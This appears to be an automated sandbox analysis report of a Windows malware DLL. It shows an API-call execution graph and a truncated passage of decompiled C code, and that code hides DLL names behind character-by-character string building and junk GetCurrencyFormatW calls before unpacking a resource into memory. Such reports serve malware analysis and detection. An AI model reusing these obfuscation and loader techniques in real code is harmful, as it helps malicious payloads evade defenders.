                                                                                                            execution_graph 26535 10003044 VirtualFree 26536 100209c7 26537 100209d3 26536->26537 26538 100209ce 26536->26538 26542 100208d1 26537->26542 26554 10027ed8 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 26538->26554 26541 100209e4 26544 100208dd ___FrameUnwindToState 26542->26544 26543 1002092a 26545 1002097a ___FrameUnwindToState 26543->26545 26609 100042f6 26543->26609 26544->26543 26544->26545 26555 100206f8 26544->26555 26545->26541 26548 1002095a 26548->26545 26550 100206f8 __CRT_INIT@12 164 API calls 26548->26550 26550->26545 26551 100042f6 ___DllMainCRTStartup 390 API calls 26552 10020951 26551->26552 26553 100206f8 __CRT_INIT@12 164 API calls 26552->26553 26553->26548 26554->26537 26556 10020822 26555->26556 26557 1002070b GetProcessHeap HeapAlloc 26555->26557 26559 1002085d 26556->26559 26564 10020828 26556->26564 26558 1002072f GetVersionExA 26557->26558 26586 10020728 26557->26586 26560 1002074a GetProcessHeap HeapFree 26558->26560 26561 1002073f GetProcessHeap HeapFree 26558->26561 26562 10020862 26559->26562 26563 100208bb 26559->26563 26565 10020776 26560->26565 26561->26586 26776 10025cd2 7 API calls __decode_pointer 26562->26776 26563->26586 26806 10025fa9 81 API calls 2 library calls 26563->26806 26567 10020847 26564->26567 26564->26586 26765 10020e42 26564->26765 26679 10024b73 HeapCreate 26565->26679 26567->26586 26774 10027859 70 API calls __input_s_l 26567->26774 26568 10020867 26777 1002695e 26568->26777 26574 100207ac 26574->26586 26689 10026012 GetModuleHandleA 26574->26689 26575 10020851 26775 10025cfc 6 API calls __decode_pointer 26575->26775 26579 100207ba __RTC_Initialize 26583 100207be 26579->26583 26587 100207cd GetCommandLineA 26579->26587 26768 10024bcd VirtualFree HeapFree HeapFree HeapDestroy 26583->26768 26586->26543 26722 10027bd1 26587->26722 26588 10020898 26792 10025d39 69 API calls 4 library calls 26588->26792 26589 100208af 26793 1001f6f4 26589->26793 26594 1002089f GetCurrentThreadId 26594->26586 26596 100207e7 26597 100207f2 26596->26597 26598 100207eb 26596->26598 26770 10027b18 113 API calls 3 library calls 26597->26770 26769 10025cfc 6 API calls __decode_pointer 26598->26769 26601 100207f7 26602 1002080b 26601->26602 26771 100278a5 112 API calls 6 library calls 26601->26771 26608 10020810 26602->26608 26773 10027859 70 API calls __input_s_l 26602->26773 26605 10020800 26605->26602 26772 10020cd1 76 API calls 3 library calls 26605->26772 26606 10020820 26606->26598 26608->26586 26610 10004b3c 26609->26610 26611 10004317 26609->26611 26900 1001fbb5 26610->26900 26871 100036fa 26611->26871 26614 1000431c 26615 10004324 31 API calls 26614->26615 26616 10004b5b 26614->26616 26877 10001534 GetCurrencyFormatW 26615->26877 26908 10020633 107 API calls 6 library calls 26616->26908 26617 10004b73 26617->26548 26617->26551 26621 10001534 ___DllMainCRTStartup 11 API calls 26622 100047f4 26621->26622 26623 10001534 ___DllMainCRTStartup 11 API calls 26622->26623 26624 1000481b 26623->26624 26885 10001688 12 API calls 26624->26885 26627 10001688 ___DllMainCRTStartup 16 API calls 26628 10004840 26627->26628 26629 10001688 ___DllMainCRTStartup 16 API calls 26628->26629 26630 10004853 26629->26630 26631 10001688 ___DllMainCRTStartup 16 API calls 26630->26631 26632 10004866 26631->26632 26633 10001688 ___DllMainCRTStartup 16 API calls 26632->26633 26634 10004879 26633->26634 26635 10001688 ___DllMainCRTStartup 16 API calls 26634->26635 26636 1000488c 26635->26636 26637 10001688 ___DllMainCRTStartup 16 API calls 26636->26637 26638 1000489f 26637->26638 26639 10001688 ___DllMainCRTStartup 16 API calls 26638->26639 26640 100048b2 26639->26640 26641 10001688 ___DllMainCRTStartup 16 API calls 26640->26641 26642 100048c8 26641->26642 26643 10001688 ___DllMainCRTStartup 16 API calls 26642->26643 26644 100048db 26643->26644 26645 10001688 ___DllMainCRTStartup 16 API calls 26644->26645 26646 100048ee 26645->26646 26647 10001688 ___DllMainCRTStartup 16 API calls 26646->26647 26648 10004901 26647->26648 26649 10001688 ___DllMainCRTStartup 16 API calls 26648->26649 26650 10004914 26649->26650 26651 10001688 ___DllMainCRTStartup 16 API calls 26650->26651 26652 10004927 26651->26652 26653 10001688 ___DllMainCRTStartup 16 API calls 26652->26653 26654 1000493a 26653->26654 26655 10001688 ___DllMainCRTStartup 16 API calls 26654->26655 26656 1000494d 26655->26656 26657 10001688 ___DllMainCRTStartup 16 API calls 26656->26657 26658 10004963 26657->26658 26659 10001688 ___DllMainCRTStartup 16 API calls 26658->26659 26660 10004976 26659->26660 26661 10001688 ___DllMainCRTStartup 16 API calls 26660->26661 26662 10004989 26661->26662 26663 10001688 ___DllMainCRTStartup 16 API calls 26662->26663 26664 1000499c 26663->26664 26665 10001688 ___DllMainCRTStartup 16 API calls 26664->26665 26666 100049af 26665->26666 26667 10001688 ___DllMainCRTStartup 16 API calls 26666->26667 26668 100049c2 26667->26668 26669 10001688 ___DllMainCRTStartup 16 API calls 26668->26669 26670 100049d5 FindResourceW LoadResource SizeofResource 26669->26670 26671 10004a84 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW VirtualAlloc 26670->26671 26672 10004a2a GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW VirtualAllocExNuma 26670->26672 26673 10004ad9 memcpy malloc 26671->26673 26672->26673 26891 100018d8 GetCurrencyFormatW malloc GetCurrencyFormatW 26673->26891 26675 10004b14 26896 10001b36 13 API calls 26675->26896 26677 10004b2b ??3@YAXPAX 26897 100042ca 26677->26897 26680 10024b93 26679->26680 26681 10024b96 26679->26681 26680->26574 26807 10024b18 69 API calls 2 library calls 26681->26807 26683 10024b9b 26684 10024ba5 26683->26684 26685 10024bc9 26683->26685 26808 10024019 HeapAlloc 26684->26808 26685->26574 26687 10024baf 26687->26685 26688 10024bb4 HeapDestroy 26687->26688 26688->26680 26690 10026024 26689->26690 26691 1002602d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26689->26691 26809 10025cfc 6 API calls __decode_pointer 26690->26809 26693 10026077 TlsAlloc 26691->26693 26696 10026191 26693->26696 26697 100260c5 TlsSetValue 26693->26697 26696->26579 26697->26696 26698 100260d6 26697->26698 26810 10020e51 5 API calls 3 library calls 26698->26810 26700 100260db 26811 10025bfa TlsGetValue 26700->26811 26703 10025bfa __encode_pointer 5 API calls 26704 100260f6 26703->26704 26705 10025bfa __encode_pointer 5 API calls 26704->26705 26706 10026106 26705->26706 26707 10025bfa __encode_pointer 5 API calls 26706->26707 26708 10026116 26707->26708 26820 10023e72 69 API calls ___crtInitCritSecAndSpinCount 26708->26820 26710 10026123 26711 1002618c 26710->26711 26712 10025c66 __decode_pointer 5 API calls 26710->26712 26822 10025cfc 6 API calls __decode_pointer 26711->26822 26714 10026137 26712->26714 26714->26711 26715 1002695e __calloc_crt 69 API calls 26714->26715 26716 10026150 26715->26716 26716->26711 26717 10025c66 __decode_pointer 5 API calls 26716->26717 26718 1002616a 26717->26718 26718->26711 26719 10026171 26718->26719 26821 10025d39 69 API calls 4 library calls 26719->26821 26721 10026179 GetCurrentThreadId 26721->26696 26723 10027c0c 26722->26723 26724 10027bed GetEnvironmentStringsW 26722->26724 26726 10027bf5 26723->26726 26727 10027ca7 26723->26727 26725 10027c01 GetLastError 26724->26725 26724->26726 26725->26723 26728 10027c27 GetEnvironmentStringsW 26726->26728 26734 10027c36 WideCharToMultiByte 26726->26734 26729 10027caf GetEnvironmentStrings 26727->26729 26731 100207dd 26727->26731 26728->26731 26728->26734 26729->26731 26732 10027cbf 26729->26732 26748 10027619 26731->26748 26824 1002691e 69 API calls _malloc 26732->26824 26735 10027c6a 26734->26735 26736 10027c9c FreeEnvironmentStringsW 26734->26736 26823 1002691e 69 API calls _malloc 26735->26823 26736->26731 26739 10027cd8 26741 10027ceb _memcpy_s 26739->26741 26742 10027cdf FreeEnvironmentStringsA 26739->26742 26740 10027c70 26740->26736 26743 10027c79 WideCharToMultiByte 26740->26743 26746 10027cf3 FreeEnvironmentStringsA 26741->26746 26742->26731 26744 10027c8a 26743->26744 26745 10027c93 26743->26745 26747 1001f6f4 __input_s_l 69 API calls 26744->26747 26745->26736 26746->26731 26747->26745 26825 10022714 26748->26825 26750 10027625 GetStartupInfoA 26751 1002695e __calloc_crt 69 API calls 26750->26751 26754 10027646 26751->26754 26752 10027850 ___FrameUnwindToState 26752->26596 26753 10027797 26755 100277cd GetStdHandle 26753->26755 26756 10027832 SetHandleCount 26753->26756 26758 100277df GetFileType 26753->26758 26763 100277f6 26753->26763 26754->26752 26754->26753 26757 1002695e __calloc_crt 69 API calls 26754->26757 26759 1002771a 26754->26759 26755->26753 26756->26752 26757->26754 26758->26753 26759->26753 26761 10027743 GetFileType 26759->26761 26762 1002774e 26759->26762 26761->26759 26761->26762 26762->26752 26762->26759 26826 1002894c 69 API calls 5 library calls 26762->26826 26763->26752 26763->26753 26827 1002894c 69 API calls 5 library calls 26763->26827 26828 10020d63 26765->26828 26767 10020e4d 26767->26567 26768->26586 26770->26601 26771->26605 26772->26602 26773->26606 26774->26575 26776->26568 26780 10026962 26777->26780 26779 10020873 26779->26586 26783 10025c66 TlsGetValue 26779->26783 26780->26779 26781 10026982 Sleep 26780->26781 26848 1001fcce 26780->26848 26782 10026997 26781->26782 26782->26779 26782->26780 26784 10025c9a GetModuleHandleA 26783->26784 26785 10025c79 26783->26785 26787 10020891 26784->26787 26788 10025ca9 GetProcAddress 26784->26788 26785->26784 26786 10025c83 TlsGetValue 26785->26786 26789 10025c8e 26786->26789 26787->26588 26787->26589 26791 10025c92 26788->26791 26789->26784 26789->26791 26790 10025cb9 RtlDecodePointer 26790->26787 26791->26787 26791->26790 26792->26594 26795 1001f700 ___FrameUnwindToState 26793->26795 26794 1001f779 ___FrameUnwindToState __dosmaperr 26794->26586 26795->26794 26805 1001f73f 26795->26805 26867 10023fe8 69 API calls 2 library calls 26795->26867 26796 1001f754 RtlFreeHeap 26796->26794 26798 1001f766 26796->26798 26870 10020b71 69 API calls __getptd_noexit 26798->26870 26800 1001f76b GetLastError 26800->26794 26801 1001f717 ___sbh_find_block 26804 1001f731 26801->26804 26868 1002408c VirtualFree VirtualFree HeapFree __VEC_memcpy __shift 26801->26868 26869 1001f74a LeaveCriticalSection _doexit 26804->26869 26805->26794 26805->26796 26806->26586 26807->26683 26808->26687 26810->26700 26812 10025c2e GetModuleHandleA 26811->26812 26813 10025c0d 26811->26813 26814 10025c57 26812->26814 26815 10025c3d GetProcAddress 26812->26815 26813->26812 26816 10025c17 TlsGetValue 26813->26816 26814->26703 26817 10025c26 26815->26817 26819 10025c22 26816->26819 26817->26814 26818 10025c4d RtlEncodePointer 26817->26818 26818->26814 26819->26812 26819->26817 26820->26710 26821->26721 26823->26740 26824->26739 26825->26750 26826->26762 26827->26763 26829 10020d6f ___FrameUnwindToState 26828->26829 26844 10023fe8 69 API calls 2 library calls 26829->26844 26831 10020d76 26833 10025c66 __decode_pointer 5 API calls 26831->26833 26843 10020db2 _doexit 26831->26843 26835 10020da5 26833->26835 26834 10020dfd 26836 10020e03 26834->26836 26837 10020e2b ___FrameUnwindToState 26834->26837 26838 10025c66 __decode_pointer 5 API calls 26835->26838 26846 10023f10 LeaveCriticalSection 26836->26846 26837->26767 26838->26843 26840 10020e10 26847 10020bff GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 26840->26847 26845 10020e1c LeaveCriticalSection _doexit 26843->26845 26844->26831 26845->26834 26846->26840 26849 1001fcda ___FrameUnwindToState 26848->26849 26850 1001fcf2 26849->26850 26860 1001fd11 _memset 26849->26860 26861 10020b71 69 API calls __getptd_noexit 26850->26861 26852 1001fcf7 26862 10024f4c 5 API calls 2 library calls 26852->26862 26854 1001fd83 RtlAllocateHeap 26854->26860 26855 1001fd07 ___FrameUnwindToState 26855->26780 26860->26854 26860->26855 26863 10023fe8 69 API calls 2 library calls 26860->26863 26864 10024835 5 API calls 2 library calls 26860->26864 26865 1001fdca LeaveCriticalSection _doexit 26860->26865 26866 10024e24 5 API calls __decode_pointer 26860->26866 26861->26852 26863->26860 26864->26860 26865->26860 26866->26860 26867->26801 26868->26804 26869->26805 26870->26800 26909 1001f631 26871->26909 26873 10003705 26874 1000370a 26873->26874 26875 1001f6f4 __input_s_l 69 API calls 26873->26875 26874->26614 26876 1000372d 26875->26876 26876->26614 26937 100014f4 GetCurrencyFormatW 26877->26937 26879 10001585 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 26880 1000161c GetCurrencyFormatW 26879->26880 26938 10001395 26880->26938 26883 1000167c 26883->26621 26884 10001654 GetCurrencyFormatW 26884->26880 26884->26883 26886 10001838 GetCurrencyFormatW 26885->26886 26887 1000188f 26885->26887 26888 10001862 ___DllMainCRTStartup 26886->26888 26887->26627 26889 10001875 GetCurrencyFormatW 26888->26889 26890 10001899 GetCurrencyFormatW GetCurrencyFormatW 26888->26890 26889->26886 26889->26887 26890->26887 26892 10001960 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 26891->26892 26893 10001a05 26891->26893 26892->26892 26892->26893 26894 10001a0a 6 API calls 26893->26894 26894->26894 26895 10001b23 ??3@YAXPAX 26894->26895 26895->26675 26896->26677 26945 100039a9 GetCurrencyFormatW GetCurrencyFormatW 26897->26945 26901 1001fbbd 26900->26901 26902 1001fbbf IsDebuggerPresent 26900->26902 26901->26617 27050 1002caf6 26902->27050 26905 10026347 SetUnhandledExceptionFilter UnhandledExceptionFilter 26906 1002636c GetCurrentProcess TerminateProcess 26905->26906 26907 10026364 __invoke_watson 26905->26907 26906->26617 26907->26906 26908->26610 26910 1001f6de 26909->26910 26920 1001f63f 26909->26920 26935 10024e24 5 API calls __decode_pointer 26910->26935 26912 1001f6e4 26936 10020b71 69 API calls __getptd_noexit 26912->26936 26915 1001f6ea 26915->26873 26918 1001f6a2 RtlAllocateHeap 26918->26920 26920->26918 26921 1001f6d5 26920->26921 26922 1001f654 26920->26922 26923 1001f6c9 26920->26923 26926 1001f6c7 26920->26926 26931 1001f5e2 69 API calls 4 library calls 26920->26931 26932 10024e24 5 API calls __decode_pointer 26920->26932 26921->26873 26922->26920 26928 10024de1 69 API calls __NMSG_WRITE 26922->26928 26929 10024c41 69 API calls 6 library calls 26922->26929 26930 10020bff GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 26922->26930 26933 10020b71 69 API calls __getptd_noexit 26923->26933 26934 10020b71 69 API calls __getptd_noexit 26926->26934 26928->26922 26929->26922 26931->26920 26932->26920 26933->26926 26934->26921 26935->26912 26936->26915 26937->26879 26939 100013a1 ___DllMainCRTStartup 26938->26939 26940 100013b2 26939->26940 26941 10001406 GetCurrencyFormatW 26939->26941 26943 10001450 GetCurrencyFormatW 26939->26943 26940->26883 26940->26884 26941->26939 26942 10001427 GetCurrencyFormatW 26941->26942 26942->26939 26943->26939 26944 10001471 GetCurrencyFormatW 26943->26944 26944->26939 27000 10001e20 GetCurrencyFormatW 26945->27000 26947 10003a01 26948 10003a0e GetCurrencyFormatW 26947->26948 26976 10003a07 26947->26976 26949 10003a33 GetCurrencyFormatW GetCurrencyFormatW 26948->26949 26948->26976 27001 10001e20 GetCurrencyFormatW 26949->27001 26951 10003a76 26952 10003a7c GetCurrencyFormatW GetCurrencyFormatW 26951->26952 26951->26976 26953 10003ac4 GetCurrencyFormatW 26952->26953 26952->26976 26954 10003aee GetCurrencyFormatW 26953->26954 26953->26976 26955 10003b11 GetCurrencyFormatW GetCurrencyFormatW 26954->26955 26954->26976 26956 10003c26 GetCurrencyFormatW GetNativeSystemInfo GetCurrencyFormatW GetCurrencyFormatW 26955->26956 26958 10003b6d 26955->26958 27002 10001de9 GetCurrencyFormatW 26956->27002 26960 10003ba2 GetCurrencyFormatW 26958->26960 26961 10003b8d GetCurrencyFormatW 26958->26961 26959 10003c8a GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27003 10001de9 GetCurrencyFormatW 26959->27003 26963 10003bb4 GetCurrencyFormatW 26960->26963 26961->26963 26965 10003bf4 GetCurrencyFormatW 26963->26965 26966 10003bd7 GetCurrencyFormatW 26963->26966 26964 10003cef 26967 10003cfa GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 26964->26967 26964->26976 26965->26956 26965->26958 26966->26965 26968 10003d7e 26967->26968 26969 10003e14 GetCurrencyFormatW GetCurrencyFormatW GetProcessHeap HeapAlloc GetCurrencyFormatW 26968->26969 26970 10003d8d GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 26968->26970 26971 10003ead GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 26969->26971 26972 10003e7d GetCurrencyFormatW 26969->26972 26974 10003e05 26970->26974 27004 10001e20 GetCurrencyFormatW 26971->27004 26972->26976 26974->26969 26974->26976 26975 10003f6e 26977 100041d1 26975->26977 26978 10003f78 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 26975->26978 26976->26610 27035 10003567 12 API calls 26977->27035 26980 10003fd5 7 API calls 26978->26980 27005 10001e51 24 API calls ___DllMainCRTStartup 26980->27005 26982 100040b9 26982->26977 26983 100040c4 GetCurrencyFormatW 26982->26983 26984 10004155 26983->26984 26985 100040ef GetCurrencyFormatW GetCurrencyFormatW 26983->26985 26987 1000415c GetCurrencyFormatW 26984->26987 27033 1000290c 19 API calls 26985->27033 27006 10002bde 28 API calls 26987->27006 26988 1000412b GetCurrencyFormatW 26988->26987 26990 1000417e 26990->26977 26991 10004183 GetCurrencyFormatW 26990->26991 27007 10002482 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 26991->27007 26994 100041aa GetCurrencyFormatW 27034 10002863 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 26994->27034 26996 100041cc 26996->26977 26997 100041e0 26996->26997 26997->26976 26998 10004223 GetCurrencyFormatW 26997->26998 26999 100041fc GetCurrencyFormatW 26997->26999 26998->26976 26999->26976 27000->26947 27001->26951 27002->26959 27003->26964 27004->26975 27005->26982 27006->26990 27008 10002518 GetCurrencyFormatW 27007->27008 27009 10002539 GetCurrencyFormatW GetCurrencyFormatW 27007->27009 27008->27009 27036 10001db6 GetCurrencyFormatW 27009->27036 27011 10002585 GetCurrencyFormatW 27037 100021ce GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27011->27037 27013 100025b1 GetCurrencyFormatW GetCurrencyFormatW 27014 1000283b 27013->27014 27015 1000261c GetCurrencyFormatW GetCurrencyFormatW 27013->27015 27016 1000227a ___DllMainCRTStartup 11 API calls 27014->27016 27038 10001db6 GetCurrencyFormatW 27015->27038 27019 10002850 27016->27019 27018 1000266c GetCurrencyFormatW 27039 100021ce GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27018->27039 27019->26977 27019->26994 27021 10002698 GetCurrencyFormatW 27022 10002766 GetCurrencyFormatW 27021->27022 27023 100026cb GetCurrencyFormatW 27021->27023 27025 100027b7 GetCurrencyFormatW 27022->27025 27026 10002789 GetCurrencyFormatW 27022->27026 27023->27022 27024 100026f2 GetCurrencyFormatW 27023->27024 27040 1000227a 27024->27040 27029 100027de GetCurrencyFormatW 27025->27029 27026->27025 27028 100027ae 27026->27028 27028->27029 27031 10002807 GetCurrencyFormatW 27029->27031 27031->27014 27031->27015 27032 10002720 GetCurrencyFormatW 27032->27031 27033->26988 27034->26996 27035->26976 27036->27011 27037->27013 27038->27018 27039->27021 27041 10002289 GetCurrencyFormatW 27040->27041 27045 10002283 27040->27045 27042 10002348 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27041->27042 27047 100022c1 27041->27047 27043 1000240d GetCurrencyFormatW 27042->27043 27044 1000242f GetCurrencyFormatW GetCurrencyFormatW VirtualProtect 27042->27044 27043->27044 27044->27045 27045->27019 27045->27032 27046 1000230d GetCurrencyFormatW 27046->27045 27047->27045 27047->27046 27048 100022dd GetCurrencyFormatW 27047->27048 27048->27045 27049 10002306 27048->27049 27049->27046 27050->26905 27051 10010a4a 27054 10010a56 __EH_prolog3 27051->27054 27053 10010aa4 27078 100105f0 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 27053->27078 27054->27053 27062 10010763 EnterCriticalSection 27054->27062 27076 10004e6e 2 API calls 4 library calls 27054->27076 27077 10010873 TlsAlloc InitializeCriticalSection 27054->27077 27056 10010ab1 27059 10010ab7 27056->27059 27060 10010aca ~_Task_impl 27056->27060 27079 10010915 90 API calls 4 library calls 27059->27079 27063 10010782 27062->27063 27065 100107d0 GlobalHandle GlobalUnlock 27063->27065 27066 100107bb 27063->27066 27075 1001083e _memset 27063->27075 27064 10010852 LeaveCriticalSection 27064->27054 27068 100010c9 ctype 83 API calls 27065->27068 27080 100010c9 27066->27080 27069 100107ed GlobalReAlloc 27068->27069 27071 100107f7 27069->27071 27072 1001081f GlobalLock 27071->27072 27073 10010810 LeaveCriticalSection 27071->27073 27074 10010802 GlobalHandle GlobalLock 27071->27074 27072->27075 27073->27072 27074->27073 27075->27064 27076->27054 27077->27054 27078->27056 27079->27060 27081 100010dc ctype 27080->27081 27082 100010e9 GlobalAlloc 27081->27082 27084 10001027 83 API calls ctype 27081->27084 27082->27071 27084->27082 27085 1000373c 27086 10003745 ExitProcess 27085->27086 27087 1000374c 27085->27087 27090 10003122 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27087->27090 27091 100031b1 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW 27090->27091 27092 1000355d 27090->27092 27091->27092 27093 1000320d GetCurrencyFormatW 27091->27093 27093->27092 27094 10003231 27093->27094 27095 10003249 GetCurrencyFormatW 27094->27095 27096 1000327d GetCurrencyFormatW 27094->27096 27095->27092 27097 10003274 GetCurrencyFormatW 27095->27097 27096->27092 27098 1000329a 27096->27098 27097->27092 27103 10003530 GetCurrencyFormatW 27097->27103 27100 100032a9 7 API calls 27098->27100 27101 1000349f GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW bsearch 27098->27101 27100->27092 27102 10003388 GetCurrencyFormatW 27100->27102 27101->27092 27101->27097 27104 10003452 GetCurrencyFormatW GetCurrencyFormatW qsort 27102->27104 27105 100033af 6 API calls 27102->27105 27103->27092 27104->27101 27105->27104 27105->27105 27106 1000302d VirtualAlloc

                                                                                                            Executed Functions

                                                                                                            Function 100042F6 Relevance: 133.6, APIs: 46, Strings: 30, Instructions: 598memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 81%
                                                                                                            			E100042F6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8) {
				signed int _v4;
				int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				char _v32;
				int _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				char _v56;
				int _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				struct HINSTANCE__* _v80;
				signed int _v84;
				int _v88;
				void* _v92;
				signed int _t177;
				int _t183;
				int _t185;
				intOrPtr _t277;
				struct HRSRC__* _t278;
				long _t280;
				signed int _t285;
				long _t291;
				void* _t292;
				void* _t294;
				intOrPtr _t298;
				short* _t312;
				void* _t314;
				void* _t321;
				short* _t326;
				signed int _t330;
				void* _t334;
				intOrPtr _t338;

				_t322 = __esi;
				_t319 = __edi;
				_t318 = __edx;
				_t314 = __ecx;
				_t311 = __ebx;
				_t330 =  &_v92;
				_t177 =  *0x10045580; // 0x8f64cb61
				_v4 = _t177 ^ _t330;
				_v80 = _a4;
				_t336 = _a8 != 1;
				if(_a8 != 1) {
					L6:
					_t183 = 1;
				} else {
					_t185 = E100036FA(__ebx, __esi, _t336);
					_t337 = _t185;
					if(_t185 != 0) {
						_push(0x10036c38);
						E10020633(__ebx, __edx, __edi, __esi, __eflags);
						_t183 = 0;
						__eflags = 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_t326 = L"xadqsavcbdfewescGADW";
						_t312 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
						 *0x100440cc = _t185;
						 *0x100440d0 = _t185;
						 *0x100440d4 = _t185;
						 *0x100440dc = _t185;
						 *0x100440d8 = _t185;
						 *0x100440e0 = _t185;
						 *0x100440e4 = _t185;
						_v32 = 0x417;
						_v30 = 0x44e;
						_v28 = 0x451;
						_v26 = 0x43a;
						_v24 = 0x416;
						_v22 = 0x401;
						_v20 = 0x448;
						_v18 = 0x428;
						_v16 = 0x44e;
						_v14 = 0x41a;
						_v12 = 0x41f;
						_v10 = 0x441;
						_v8 = _t185;
						_v76 = 0x42a;
						_v74 = 0x442;
						_v72 = 0x423;
						_v70 = 0x44e;
						_v68 = 0x448;
						_v66 = 0x44f;
						_v64 = 0x42c;
						_v62 = 0x43b;
						_v60 = 0x442;
						_v58 = _t185;
						_v56 = 0x442;
						_v54 = 0x44a;
						_v52 = 0x43f;
						_v50 = 0x448;
						_v48 = 0x423;
						_v46 = 0x437;
						_v44 = 0x43d;
						_v42 = 0x43a;
						_v40 = 0x451;
						_v38 = 0x442;
						_v36 = _t185;
						 *((short*)(_t330 + 0x64 + GetCurrencyFormatW(_t185, 0x11d4, _t312, _t185, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6b;
						 *((short*)(_t330 + 0x66 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x65;
						 *((short*)(_t330 + 0x60 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x72;
						 *((short*)(_t330 + 0x6a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6e;
						 *((short*)(_t330 + 0x6c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x65;
						 *((short*)(_t330 + 0x6e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x70 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x33;
						 *((short*)(_t330 + 0x72 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x32;
						 *((short*)(_t330 + 0x74 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x2e;
						 *((short*)(_t330 + 0x76 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x64;
						 *((short*)(_t330 + 0x78 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x72 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc * 2)) = 0x6c;
						 *((short*)(_t330 + 0x38 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6e;
						 *((short*)(_t330 + 0x3a + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x74;
						 *((short*)(_t330 + 0x3c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x64;
						 *((short*)(_t330 + 0x3e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x42 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x2e;
						 *((short*)(_t330 + 0x44 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x64;
						 *((short*)(_t330 + 0x46 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 * 2)) = 0x6c;
						 *((short*)(_t330 + 0x4c + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x6d;
						 *((short*)(_t330 + 0x4e + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x73;
						 *((short*)(_t330 + 0x50 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x76;
						 *((short*)(_t330 + 0x52 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x63;
						 *((short*)(_t330 + 0x54 + GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440d4 * 2)) = 0x72;
